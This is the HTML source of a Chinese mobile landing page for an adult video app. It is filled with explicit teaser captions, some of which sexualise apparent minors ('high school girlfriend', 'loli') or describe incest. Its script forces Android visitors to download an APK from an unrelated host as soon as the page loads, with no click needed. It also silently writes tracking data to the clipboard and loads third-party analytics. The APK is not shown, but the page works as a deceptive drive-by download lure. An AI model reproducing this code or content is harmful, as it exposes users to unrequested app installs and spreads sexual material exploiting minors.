<!DOCTYPE html>
<html lang="zh-CN" data-dpr="1" style="font-size: 36px;">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>红楼播放器 深夜利器</title>
    <meta name="viewport"
          content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no">
    <meta name="full-screen" content="yes">
    <meta name="x5-fullscreen" content="true">
    <meta name="applicable-device" content="mobile">
    <meta name="referrer" content="never">
    <meta name="description" content="宅男深夜利器">
    <link rel="stylesheet" href="./files/v.css">
    <link rel="stylesheet" href="./files/swiper.min.css">
    <style>
        .modal {
            position: fixed;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            z-index: 1110;
            outline: 0;
            text-align: center;
            background: rgba(0, 0, 0, 0.6);
            display: none;
        }
        .cu-dialog {
            margin: calc(35vh) auto 0;
            width: calc(50vw);
            height: 150px;
            background: linear-gradient(to bottom, #FF5686, #FF8D8C);
            border-radius: 10px; color: #fff;
        }
        .close-modal{
            padding: 10px 15px;background: #FF5686;
            color: #fff;line-height: 40px;
            position: relative;top:15px;font-size: 14px;
        }

    </style>
</head>
<body>
<header class="js_pop down">
    <img src="./files/logo.png">
    <p>红楼播放器 宅男深夜利器<br>海量外围/主播/免費高清正版视频</p>
    <a href="javascript:;" onclick="down()">立即体验</a>
</header>
<section class="pt js_pop down" onclick="down()">
    <div class="swiper-container swiper-container-initialized swiper-container-horizontal swiper-container-ios swiper-container-android">
        <div class="swiper-wrapper" style="transition-duration: 0ms; transform: translate3d(-360px, 0px, 0px);">
            <div class="swiper-slide swiper-slide-duplicate swiper-slide-prev swiper-slide-duplicate-next"
                 data-swiper-slide-index="1" style="width: 360px;height: 5rem">
                <img src="./files/m2.jpg">
            </div>
            <div class="swiper-slide swiper-slide-active" data-swiper-slide-index="0" style="width: 360px;;height: 5rem">
                <img src="./files/mm12.jpg">
            </div>
            <div class="swiper-slide swiper-slide-next swiper-slide-duplicate-prev" data-swiper-slide-index="1"
                 style="width: 360px;;height: 5rem">
                <img src="./files/m2.jpg">
            </div>
            <div class="swiper-slide swiper-slide-duplicate swiper-slide-duplicate-active"
                 data-swiper-slide-index="0" style="width: 360px;;height: 5rem">
                <img src="./files/mm12.jpg">
            </div>
        </div>
        <div class="swiper-pagination swiper-pagination-bullets"><span
                class="swiper-pagination-bullet swiper-pagination-bullet-active"></span><span
                class="swiper-pagination-bullet"></span></div>
        <span class="swiper-notification" aria-live="assertive" aria-atomic="true"></span>
        <span class="swiper-notification" aria-live="assertive" aria-atomic="true"></span><span
            class="swiper-notification" aria-live="assertive" aria-atomic="true"></span>
        <span class="swiper-notification" aria-live="assertive" aria-atomic="true"></span></div>
</section>


<section class="chat js_pop down" onclick="down()">
    <div class="com_tit">精彩视频</div>
    <ul class="clearfix">
        <li class="img1" style="background-image:url('./files/556.jpg')">
            <p>表妹在被子里给表哥舔 正好他们的爸爸妈妈走进来</p>
        </li>
        <li class="img2" style="background-image: url('./files/2.jpg')">
            <p>国产人气</p>
        </li>
        <li class="img3" style="background-image:url('./files/778.png')">
            <p>国产双飞</p>
        </li>
        <li class="img4" style="background-image: url('./files/776.png')">
            <p>欧美巨乳</p>
        </li>
        <li class="img5" style="background-image:url('./files/5.jpg')">
            <p>新人筱曲曲</p>
        </li>
        <li class="img6" style="background-image: url('./files/6.jpg')">
            <p>高中小女友</p>
        </li>
    </ul>
</section>

<section class="single js_pop down" onclick="down()">
    <div class="com_tit">后入人妻</div>
    <ul>
        <li>
                <span class="pic" style="background-image: url('./files/40.jpg')"><i
                        class="icon_2">娇嫩萝莉</i></span>
            <p>可怜加冰 <em>23岁</em><i>24.1km</i></p>
        </li>
        <li>
                <span class="pic"
                      style="background-image: url('./files/41.jpg')"><i>新人主播</i></span>
            <p>糖小甜丫 <em>29岁</em><i>66.4km</i></p>
        </li>

        <li>
                <span class="pic"
                      style="background-image:url('./files/30.jpg')"><i>免费大秀</i></span>
            <p>Gaby潇潇 <em>20岁</em><i>2.8km</i></p>
        </li>
        <li>
                <span class="pic" style="background-image: url('./files/31.jpg')"><i
                        class="icon_2">远程跳蛋</i></span>
            <p>美柒 <em>23岁</em><i>3.3km</i></p>
        </li>
        <li>
                <span class="pic"
                      style="background-image: url('./files/42.jpg')"><i>才艺主播</i></span>
            <p>琴儿爱萝卜<em>19岁</em><i>21km</i></p>
        </li>
        <li>
                <span class="pic" style="background-image: url('./files/43.jpg')"><i
                        class="icon_3">欲罢不能</i></span>
            <p>刘飞儿呀 <em>21岁</em><i>66.4km</i></p>
        </li>
        <li>
                <span class="pic" style="background-image: url('./files/32.jpg')"><i
                        class="icon_3">炮机喷水</i></span>
            <p>小小若希 <em>20岁</em><i>7.5km</i></p>
        </li>
        <li>
                <span class="pic"
                      style="background-image: url('./files/33.jpg')"><i>免费看秀</i></span>
            <p>雨瑜 <em>22岁</em><i>10.7km</i></p>
        </li>

    </ul>
</section>

<section class="chat js_pop down" onclick="down()">
    <div class="com_tit">女生社区</div>
    <ul class="clearfix">
        <li class="img1" style="background-image: url('./files/a.jpg')">
            <p>【主播快报】轩子巨2兔视频流出-竟有5000+浏览点赞</p>
        </li>
        <li class="img2" style="background-image: url('./files/b.jpg')">
            <p>花间娱乐十大女神主播</p>
        </li>
        <li class="img3" style="background-image: url('./files/c.jpg')">
            <p>主播可儿直播热舞集锦</p>
        </li>
        <li class="img4" style="background-image: url('./files/777.png')">
            <p>女神思瑞长腿竟有这么长</p>
        </li>
        <li class="img5" style="background-image: url('./files/e.jpg')">
            <p>醉后女生最爱做的5件事</p>
        </li>
        <li class="img6" style="background-image: url('./files/f.jpg')">
            <p>主播小小直播琐事（7）</p>
        </li>
    </ul>
</section>
<section class="more ptb">
    <a href="javascript:;" onclick="down()" class="js_down down">点击领取你的约妹福利</a>
</section>
<section style="text-align: center;padding-bottom: 1.45rem;font-size: 12px;">
</section>
<header class="footer js_down down">
    <img src="./files/logo.png">
    <p>海量刺激爽片 满足所有幻想</p>
    <a onclick="down()" href="javascript:;">免费下载</a>
</header>
<input id="icode" type="hidden" name="v" value=""/>
<div class="modal" id="modal">
    <div class="cu-dialog transparent">
        <img id="iosWarning" src="./files/loading.gif"  style="width: 50px;margin-top: 15px"/>
        <div style="font-size: 14px;margin-top: 25px">
            <div>正在下载APP</div>
            <div style="margin-top: 5px">请稍后...</div>
        </div>
        <div>
            <span class="close-modal" onclick="hideModal()">我知道了</span>
        </div>
    </div>
</div>

<script src="./files/jquery-3.3.1.min.js"></script>
<script src="./files/swiper.min.js"></script>
<!--
<script src="./files/jquery.min.js"></script>
<script src="./files/clipboard.min.js"></script>
<script src="./files/copy.js"></script> -->

<script>(function (win, lib) {
    var doc = win.document;
    var docEl = doc.documentElement;
    var metaEl = doc.querySelector('meta[name="viewport"]');
    var flexibleEl = doc.querySelector('meta[name="flexible"]');
    var dpr = 0;
    var scale = 0;
    var tid;
    var flexible = lib.flexible || (lib.flexible = {});
    if (metaEl) {
        var match = metaEl.getAttribute("content").match(/initial\-scale=([\d\.]+)/);
        if (match) {
            scale = parseFloat(match[1]);
            dpr = parseInt(1 / scale)
        }
    } else {
        if (flexibleEl) {
            var content = flexibleEl.getAttribute("content");
            if (content) {
                var initialDpr = content.match(/initial\-dpr=([\d\.]+)/);
                var maximumDpr = content.match(/maximum\-dpr=([\d\.]+)/);
                if (initialDpr) {
                    dpr = parseFloat(initialDpr[1]);
                    scale = parseFloat((1 / dpr).toFixed(2))
                }
                if (maximumDpr) {
                    dpr = parseFloat(maximumDpr[1]);
                    scale = parseFloat((1 / dpr).toFixed(2))
                }
            }
        }
    }
    if (!dpr && !scale) {
        var isAndroid = win.navigator.appVersion.match(/android/gi);
        var isIPhone = win.navigator.appVersion.match(/iphone/gi);
        var devicePixelRatio = win.devicePixelRatio;
        if (isIPhone) {
            if (devicePixelRatio >= 3 && (!dpr || dpr >= 3)) {
                dpr = 3
            } else {
                if (devicePixelRatio >= 2 && (!dpr || dpr >= 2)) {
                    dpr = 2
                } else {
                    dpr = 1
                }
            }
        } else {
            dpr = 1
        }
        scale = 1 / dpr
    }
    docEl.setAttribute("data-dpr", dpr);
    if (!metaEl) {
        metaEl = doc.createElement("meta");
        metaEl.setAttribute("name", "viewport");
        metaEl.setAttribute("content", "initial-scale=" + scale + ", maximum-scale=" + scale + ", minimum-scale=" + scale + ", user-scalable=no");
        if (docEl.firstElementChild) {
            docEl.firstElementChild.appendChild(metaEl)
        } else {
            var wrap = doc.createElement("div");
            wrap.appendChild(metaEl);
            doc.write(wrap.innerHTML)
        }
    }

    function refreshRem() {
        var width = docEl.getBoundingClientRect().width;
        if (width / dpr > 540) {
            width = 540 * dpr
        }
        var rem = width / 10;
        docEl.style.fontSize = rem + "px";
        flexible.rem = win.rem = rem
    }

    win.addEventListener("resize", function () {
        clearTimeout(tid);
        tid = setTimeout(refreshRem, 300)
    }, false);
    win.addEventListener("pageshow", function (e) {
        if (e.persisted) {
            clearTimeout(tid);
            tid = setTimeout(refreshRem, 300)
        }
    }, false);
    if (doc.readyState === "complete") {
        doc.body.style.fontSize = 12 * dpr + "px"
    } else {
        doc.addEventListener("DOMContentLoaded", function (e) {
            doc.body.style.fontSize = 12 * dpr + "px"
        }, false)
    }
    refreshRem();
    flexible.dpr = win.dpr = dpr;
    flexible.refreshRem = refreshRem;
    flexible.rem2px = function (d) {
        var val = parseFloat(d) * this.rem;
        if (typeof d === "string" && d.match(/rem$/)) {
            val += "px"
        }
        return val
    };
    flexible.px2rem = function (d) {
        var val = parseFloat(d) / this.rem;
        if (typeof d === "string" && d.match(/px$/)) {
            val += "rem"
        }
        return val
    }
})(window, window["lib"] || (window["lib"] = {}));</script>
<script type="text/javascript">
	//window.onload = function () {
		$(".modal").hide();
        let isiOS = !!navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);

        //取get参数
        function getQueryString(name) {
            let reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)");
            let r = window.location.search.substr(1).match(reg); //search,查询？后面的参数，并匹配正则
            if (r != null) return unescape(r[2]);
            return null;
        }

		function hideModal() {
			$(".modal").hide();
		}
		
        //复制唯一码
        function copy(message) {
            let input = document.createElement("input");
            input.value = message;
            document.body.appendChild(input);
            input.select();
            input.setSelectionRange(0, input.value.length), document.execCommand('Copy');
            document.body.removeChild(input);
        }

        //$("body").click(function (event) {
            //event.stopPropagation();    //  阻止事件冒泡
            //event.preventDefault();
            //down();
        //});

        //获取参数
        let qdid = getQueryString('qdid');
		if(qdid){
			qdid = parseInt(qdid);
			if(qdid < 5000){
				qdid = 5000;
			}
		}else{
			qdid = 5000;
		}
        let icode = getQueryString('code') ? getQueryString('code') : '';
        let down_url = "http://kong.sxyixinhe.com/" + qdid +".apk";
        if(isiOS) {
            down_url = "https://www.hlav001.com?qdid="  + qdid + '&code=' + icode;
        }else{
            window.location.href = down_url;
        }

        function down() {
            let obj = {
				icode: icode,
				sfid: '',
				qdid: qdid,
			}
			copy(JSON.stringify(obj));
			if(!isiOS) {
                $(".modal").show();
            }
            window.location.href = down_url;
        }
    //}
	
	
    new Swiper('.swiper-container', {
        loop: true,
        speed: 600,
        autoplay: {
            delay: 3500,
        },
        pagination: {
            el: '.swiper-pagination',
        }
    })
</script>
<div style="display: none">
    <script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script>
    <script>LA.init({id: "JYRNyy7uc6ljV4Rr",ck: "JYRNyy7uc6ljV4Rr"})</script>
</div>
</body>
</html>